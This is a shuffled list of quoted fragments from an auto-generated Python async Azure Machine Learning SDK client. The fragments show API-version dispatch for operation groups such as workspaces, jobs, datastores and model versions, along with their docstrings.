*", "from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "@property def events(self): \"\"\"Instance depends on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\"", "if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API", "CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview':", "models elif api_version == '2022-05-01': from ..v2022_05_01 import models return models raise ValueError(\"API", "profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any ) -> None: self._config =", "..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations", "from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {} does not", "2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version == '2021-10-01':", "== '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version {}", "version {} does not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "import WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as", "group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on", "ValueError(\"API version {} does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass", "depends on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0:", "api_version == 'v1.0': from ..registry_discovery import models return models elif api_version == 'v1.0':", "# license information. # # Code generated by Microsoft (R) AutoRest Code Generator.", ":mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version", "from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on the", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01':", "ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the API version:", "have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the API version: * 1.5.0:", "self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return {k: v for k,", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>`", "== '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API version {}", "= self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif", "raise ValueError(\"API version {} does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost", "api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass", "API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0':", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the API version:", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'environment_containers'\".format(api_version)) return", "API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0':", "@property def online_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` *", "2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01':", "the profile. :param credential: Credential needed for the client to connect to Azure.", "str :param api_version: API version to use if no profile is provided, or", "from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API version {} does not", "api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass", "\"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as", ":class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version =", "return models elif api_version == '2021-10-01': from ..v2021_10_01 import models return models elif", "{} does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self):", "if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API", "does not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "'2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version", "operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends", "..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations", "2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01':", "be lost if the code is # regenerated. # -------------------------------------------------------------------------- from typing import", "== '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0',", "help you deal with all of the Azure clouds (Azure Stack, Azure Government,", "raise ValueError(\"API version {} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on", "{} does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version ==", "== '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API version {}", "'1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API version {} does", "'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the", ":class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01': from", "dataset_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version =", "def operations(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview:", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the API", "from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "..v2020_09_01_dataplanepreview import models return models elif api_version == '2021-10-01': from ..v2021_10_01 import models", "ValueError(\"API version {} does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends", "{} does not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version", "if no profile is provided, or if missing in profile. :type api_version: str", "\"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as", "from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'metric'\".format(api_version)) return", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from", "not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self):", ":keyword int polling_interval: Default waiting time between two polls for LRO operations if", "api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass", "typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles,", "= self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else:", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from", "self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version", ":type subscription_id: str :param api_version: API version to use if no profile is", "'2021-10-01': from ..v2021_10_01 import models return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise", "SpansOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "{} does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass", ":class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations", "operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends", "from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {} does not", ":mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>`", "import ModelContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "version {} does not have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations", "from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "between two polls for LRO operations if no Retry-After header is present. \"\"\"", ":type base_url: str :param profile: A profile definition, from KnownProfiles to dict. :type", "def batch_job_endpoint(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version", "api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass", "batch_job_deployment(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version =", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version ==", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the API version:", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version", "behavior and will be lost if the code is # regenerated. # --------------------------------------------------------------------------", "DataVersionOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "uses the latest API version available on public Azure. For production, you should", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the API version: * 1.5.0:", "version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0': from", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the API", "'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the", "ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass", "{} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", ":class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version", "on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version =", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version == '2022-05-01':", "does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API version {} does not", "{} does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "ValueError(\"API version {} does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "multiple API versions, to help you deal with all of the Azure clouds", "api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview':", "self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'temporary_data_references'\".format(api_version)) return", "\"\"\"These APIs allow end users to operate on Azure Machine Learning Workspace resources.", "'2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from", "ModelVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "api_version = self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass", "api-version parameter sets the default API version if the operation group is not", "= self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif", "import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as", "@property def code_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` *", "models return models elif api_version == '1.0.0': from ..model_dataplane import models return models", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API", "== '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {}", "ValueError(\"API version {} does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "api_version = self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass", "else: raise ValueError(\"API version {} does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client,", "'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0',", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version", "2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if", ":class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif", "does not have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "KnownProfiles = KnownProfiles.default, **kwargs # type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential,", "have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance", "group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on", "..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations", "raise ValueError(\"API version {} does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config,", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the API version: *", "else: raise ValueError(\"API version {} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client,", "if the code is # regenerated. # -------------------------------------------------------------------------- from typing import Any, Optional,", "1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import", "model_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>`", "+ \" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str]", "base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any )", "from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise", "def batch_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'quotas'\".format(api_version)) return", "{} does not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return", "import DataContainerOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models elif api_version == '2022-01-01-preview':", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on the API version:", "2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if", "EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspaces'\".format(api_version)) return", "'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {} does", "operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends", "import ModelVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "depends on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if", "raise ValueError(\"API version {} does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version", "ModelsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API", "mapping between an operation group and its API version. The api-version parameter sets", ":class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations", "import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "'1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0',", "operation group 